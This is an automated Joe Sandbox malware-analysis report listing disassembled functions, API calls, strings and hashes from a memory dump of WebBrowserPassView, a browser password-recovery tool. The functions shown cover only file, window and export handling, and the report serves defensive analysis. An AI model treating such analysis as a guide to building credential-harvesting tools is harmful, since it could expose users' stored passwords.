Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3510742995-272990098
Opcode ID: e4adabbe1decd632362e132ce6bab9d224831924daf4b8fb608a03f475e217cd
Instruction ID: fb1fd52c892a386ff9235e04c27833661dd88198db5bdd6c779901d429b6f073
Opcode Fuzzy Hash: e4adabbe1decd632362e132ce6bab9d224831924daf4b8fb608a03f475e217cd
Instruction Fuzzy Hash: C6914EB5A0020ADFCB10DF59C581A9EBBF1FF48315F14815AE805AB352DB35EA41CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00409A0C Relevance: 7.7, APIs: 6, Instructions: 191COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409A2F

Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE

Part of subcall function 00404F45: memset.MSVCRT ref: 00404F65

memset.MSVCRT ref: 00409A82
memset.MSVCRT ref: 00409A9A
memset.MSVCRT ref: 00409AB2
memset.MSVCRT ref: 00409ACA
memset.MSVCRT ref: 00409AE2

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
String ID:
API String ID: 2911713577-0
Opcode ID: b2a1f19d586bb9d584c5167c27d38584a59658dc22e7c63e49521902dc34c3a0
Instruction ID: 17c299170da2f5c18cd71e263501a174130e3f539370559341ef3f42c2fa300c
Opcode Fuzzy Hash: b2a1f19d586bb9d584c5167c27d38584a59658dc22e7c63e49521902dc34c3a0
Instruction Fuzzy Hash: 725189B290121CBEEB50FB51DC42EDF776CEF04314F0100BAB908B6182EA759F949BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00411224 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411246

Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
Part of subcall function 0040D5E2: memcpy.MSVCRT ref: 0040D6FA

Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F

Part of subcall function 0040AA19: memset.MSVCRT ref: 0040AA3A
Part of subcall function 0040AA19: _snwprintf.MSVCRT ref: 0040AA6D
Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA79
Part of subcall function 0040AA19: memcpy.MSVCRT ref: 0040AA91
Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA9F
Part of subcall function 0040AA19: memcpy.MSVCRT ref: 0040AAB2

Part of subcall function 0040A838: GetSaveFileNameW.COMDLG32(?), ref: 0040A887
Part of subcall function 0040A838: wcscpy.MSVCRT ref: 0040A89E

Strings

*.csv, xrefs: 00411297
*.txt, xrefs: 00411268
txt, xrefs: 0041124B
*.htm;*.html, xrefs: 004112AC

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
String ID: *.csv$*.htm;*.html$*.txt$txt
API String ID: 1392923015-2111886889
Opcode ID: aafac17d9ad648619bbc2820d08f5d6f77f7253f9c21e5715a78e07660b7453b
Instruction ID: 21c56e8af235b710a4191330bbdd055b03883b3d4342fd00990d051e634670c5
Opcode Fuzzy Hash: aafac17d9ad648619bbc2820d08f5d6f77f7253f9c21e5715a78e07660b7453b
Instruction Fuzzy Hash: FE31FDB1D00258ABDB00EFE5DC816DDBBB8FB44318F20407BE945BB281DB389A458B59

Uniqueness

Uniqueness Score: -1.00%

Function 00449C90 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00449C9B
memset.MSVCRT ref: 00449CAB
memcpy.MSVCRT ref: 00449D0D
memcpy.MSVCRT ref: 00449D5A

Strings

gj, xrefs: 00449CB0

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpymemset
String ID: gj
API String ID: 1297977491-4203073231
Opcode ID: bc066ce618c8efd45368092d21e9600cda6cc543f99e188020d63ac60b6c492b
Instruction ID: 1e6fb78b96cc295ab1e64a1d2520aab5d7b4c62cf2bfa8bfbbde786d8273fed9
Opcode Fuzzy Hash: bc066ce618c8efd45368092d21e9600cda6cc543f99e188020d63ac60b6c492b
Instruction Fuzzy Hash: D3212CF37003405BE724AA79CC81A5B779D9FCA318F06481EF6468B342E57EDA05C725

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7F7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040B804
free.MSVCRT(0045B4C0,00000000,00000000,?,?,?,6n@,00406D1D,6n@,00000000,?,?,00406E36,00000000,-00000002,0040702A), ref: 0040B827

Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
Part of subcall function 00409FB3: memcpy.MSVCRT ref: 00409FE7
Part of subcall function 00409FB3: free.MSVCRT(00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FF0

free.MSVCRT(0045B4BC,00000000,00000000,?,?,?,6n@,00406D1D,6n@,00000000,?,?,00406E36,00000000,-00000002,0040702A), ref: 0040B84A
memcpy.MSVCRT ref: 0040B86E

Strings

6n@, xrefs: 0040B7F7

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free$memcpy$mallocwcslen
String ID: 6n@
API String ID: 726966127-1376077705
Opcode ID: 9c7b5ed43217881e54566e3aaae3d088c30ddfe0133c3a6c6c6cf896538b121f
Instruction ID: 2a297e2a749568a602d4fdd98617bb0f2def5a372598a852c8599cd2a9d3c103
Opcode Fuzzy Hash: 9c7b5ed43217881e54566e3aaae3d088c30ddfe0133c3a6c6c6cf896538b121f
Instruction Fuzzy Hash: 1E21C372500704EFD730EF18C881C9AB7F9EF453247108A2EF852976A1C735B905CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E482 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E428
Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E436
Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E447
Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E45E
Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E467

??3@YAXPAX@Z.MSVCRT ref: 0040E49D
??3@YAXPAX@Z.MSVCRT ref: 0040E4B0
??3@YAXPAX@Z.MSVCRT ref: 0040E4C3
??3@YAXPAX@Z.MSVCRT ref: 0040E4D6
free.MSVCRT(00000000), ref: 0040E50F

Part of subcall function 0040B02A: free.MSVCRT(00000000,0040B3AF,00000000,?,00000000), ref: 0040B031

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: 328a1e6adbfaa2921d3e4ffbe90ac12b6da3b64809c4e31dec7115ec90260639
Instruction ID: 42ba5fb2483a06204b9652fd9eb83631712146579ad8a5126b95c8e5bf80326c
Opcode Fuzzy Hash: 328a1e6adbfaa2921d3e4ffbe90ac12b6da3b64809c4e31dec7115ec90260639
Instruction Fuzzy Hash: 0E018E326029305BCA357B2B944142FB394FE95B2431A497FF8157B282DF3CAC5186EE

Uniqueness

Uniqueness Score: -1.00%

Function 004193E6 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 004193EE
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0041940E
malloc.MSVCRT ref: 00419414
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00419432
free.MSVCRT(?), ref: 0041943B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ApisFilefreemalloc
String ID:
API String ID: 4053608372-0
Opcode ID: 2ce22bffb2f624be5e4887deef8eb2f5bb9639764511aad977b4a3fe63ad4965
Instruction ID: 2534f474cf9bcd12f65d63d56baaca5d61982f7a50fdf52695ea10ed44cee065
Opcode Fuzzy Hash: 2ce22bffb2f624be5e4887deef8eb2f5bb9639764511aad977b4a3fe63ad4965
Instruction Fuzzy Hash: A40181B150411CBEAB115BA5DC84CBF7BACEA453EC720427AF414E2190D6344E4196B5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8EF Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0040D901
GetWindowRect.USER32 ref: 0040D90E
GetClientRect.USER32 ref: 0040D919
MapWindowPoints.USER32 ref: 0040D929
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D945

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: d02ceeb989c3102075357568c0cbbbc984dee6c70047c108da9a167d24dee429
Instruction ID: 0a594369ed784f6632fdda1da01060cc62096c5628082a149af8216bf0db4298
Opcode Fuzzy Hash: d02ceeb989c3102075357568c0cbbbc984dee6c70047c108da9a167d24dee429
Instruction Fuzzy Hash: D3018C3A801029BBDB119BA59C49EFFBFBCEF46710F00402AF901E2090D7789506CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0044653E Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94

GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00414948,?,?,?,?,00000104), ref: 00446555
??2@YAPAXI@Z.MSVCRT ref: 00446569
memset.MSVCRT ref: 00446578

Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5

??3@YAXPAX@Z.MSVCRT ref: 0044659B

Part of subcall function 0044632F: memchr.MSVCRT ref: 0044636A
Part of subcall function 0044632F: memcpy.MSVCRT ref: 0044640E
Part of subcall function 0044632F: memcpy.MSVCRT ref: 00446420
Part of subcall function 0044632F: memcpy.MSVCRT ref: 00446448

CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004465A2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
String ID:
API String ID: 1471605966-0
Opcode ID: 08e1969c99c534a4a8a1e8f80d5c1d7d72dfbfd64b25fe91d2d02474260e5a7b
Instruction ID: b0bb4d93dabac42749b0baec13122cd485f3faf15da61d3af90c3903c02b6b6c
Opcode Fuzzy Hash: 08e1969c99c534a4a8a1e8f80d5c1d7d72dfbfd64b25fe91d2d02474260e5a7b
Instruction Fuzzy Hash: 99F0F6725012107AE6207732AC89E5B7B9CDFD7375F12483FF916911D3EA388804817A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E41C Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040E428
??3@YAXPAX@Z.MSVCRT ref: 0040E436
??3@YAXPAX@Z.MSVCRT ref: 0040E447
??3@YAXPAX@Z.MSVCRT ref: 0040E45E
??3@YAXPAX@Z.MSVCRT ref: 0040E467

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 857a2a26c6fbca9ef4c3e97793939a126ffccdfad2911b2b13be327b9fa678af
Instruction ID: 5bcbd1bb2dbe542c664d49e0b1e478a6f9f39dce4da0d1c56c0f2abaad1a289c
Opcode Fuzzy Hash: 857a2a26c6fbca9ef4c3e97793939a126ffccdfad2911b2b13be327b9fa678af
Instruction Fuzzy Hash: A4F0EC726057019BDB30AF6BA4C041BB7E9AF593147658C3FF049D2641CB38A8504A19

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FC3A
memset.MSVCRT ref: 0040FC51

Part of subcall function 0040F0F7: wcscpy.MSVCRT ref: 0040F0FC
Part of subcall function 0040F0F7: _wcslwr.MSVCRT ref: 0040F137

_snwprintf.MSVCRT ref: 0040FC80

Strings

</%s>, xrefs: 0040FC6F

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 127f91db7fa9967f18098fe8fb428d38ade9bf4ee3e8a23e6577a73e3d6a66d9
Instruction ID: 220adabbb6dc37e078a4cbf870aa6778b0d4aa36b0e6c53f25afcd46a8fb6da8
Opcode Fuzzy Hash: 127f91db7fa9967f18098fe8fb428d38ade9bf4ee3e8a23e6577a73e3d6a66d9
Instruction Fuzzy Hash: ED018BB3D4021566D720B755CC45FEA776CAF45708F0100B6BB08B7182D7789A558AA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA01 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DA3B
SetWindowTextW.USER32(?,?), ref: 0040DA6B
EnumChildWindows.USER32 ref: 0040DA7B

Strings

caption, xrefs: 0040DA50

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 4d4bf3293b7fefa2b3ab9066dfd798a39334cfedb85569feeb9d9acd745ef1c9
Instruction ID: d45ce5b55de9e56b0e3606efc23fee37021493b8ccd152581ff18ec388878a93
Opcode Fuzzy Hash: 4d4bf3293b7fefa2b3ab9066dfd798a39334cfedb85569feeb9d9acd745ef1c9
Instruction Fuzzy Hash: C2F0C876E40314AAFB246B95DC4EBCA336C9B05715F1100B2FE04B61D2D7B8EE48CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040174F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A1BC: memset.MSVCRT ref: 0040A1C6
Part of subcall function 0040A1BC: wcscpy.MSVCRT ref: 0040A206

CreateFontIndirectW.GDI32(?), ref: 0040176E
SendDlgItemMessageW.USER32 ref: 0040178D
SendDlgItemMessageW.USER32 ref: 004017AB

Strings

MS Sans Serif, xrefs: 0040175A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
String ID: MS Sans Serif
API String ID: 210187428-168460110
Opcode ID: 5a950ce4a8f62aae84bef4ee5eac7b078e3a2a1a80d89d7679ccc58871670326
Instruction ID: c4faab8ea403b72454229b7d8bee71ac123bd04467b8ab2dfae6cb72e56ca799
Opcode Fuzzy Hash: 5a950ce4a8f62aae84bef4ee5eac7b078e3a2a1a80d89d7679ccc58871670326
Instruction Fuzzy Hash: 15F08275A5030877E731ABA0DC46F8A77BDB784B01F004939F721BA1D1D7F4A189C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A35D
GetClassNameW.USER32 ref: 0040A374
_wcsicmp.MSVCRT ref: 0040A386

Strings

edit, xrefs: 0040A380

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ClassName_wcsicmpmemset
String ID: edit
API String ID: 2747424523-2167791130
Opcode ID: 100da318b6eef65e8fb27ecc8cf20afda242377d63b4814d6acd95be43c53634
Instruction ID: 615f9df5883ac46bac081f077562738f5b314669235998c993cfb201dc9db725
Opcode Fuzzy Hash: 100da318b6eef65e8fb27ecc8cf20afda242377d63b4814d6acd95be43c53634
Instruction Fuzzy Hash: 17E0927298030E6AFB10ABA0DC4AFA937ACAB00704F1001B5AA15E10C3E77496494A95

Uniqueness

Uniqueness Score: -1.00%

Function 0041738A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(0045EB90,00000001,00000000), ref: 00417394
InitializeCriticalSection.KERNEL32(0045EAE8), ref: 004173A4
Sleep.KERNEL32(00000001), ref: 004173C3

Strings

E, xrefs: 0041739E

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: CompareCriticalExchangeInitializeInterlockedSectionSleep
String ID: E
API String ID: 4144454223-2089609516
Opcode ID: e6fbb2d3d1c0865c93e4ca0e00724d4cc99f07dafa5266e25547b3f1b449e72a
Instruction ID: fc88e8258406b36d4da82e75fe45474a615d48495b5640232e67b615d5a4112a
Opcode Fuzzy Hash: e6fbb2d3d1c0865c93e4ca0e00724d4cc99f07dafa5266e25547b3f1b449e72a
Instruction Fuzzy Hash: 92E04F359492249BEB249B736C087CB3E24AB41703F020037FD19E5553C3A84DC4D6DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040489A Relevance: 6.4, APIs: 5, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT(?,00000000,00000000,00000000,?), ref: 004048BB
memcmp.MSVCRT ref: 0040491E

Part of subcall function 00404701: strlen.MSVCRT ref: 00404765
Part of subcall function 00404701: memset.MSVCRT ref: 004047B1
Part of subcall function 00404701: memcpy.MSVCRT ref: 004047C4
Part of subcall function 00404701: memcpy.MSVCRT ref: 004047D7

memcmp.MSVCRT ref: 0040494C
memset.MSVCRT ref: 0040496B
memcpy.MSVCRT ref: 004049CB

Part of subcall function 004045A7: strlen.MSVCRT ref: 00404601

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

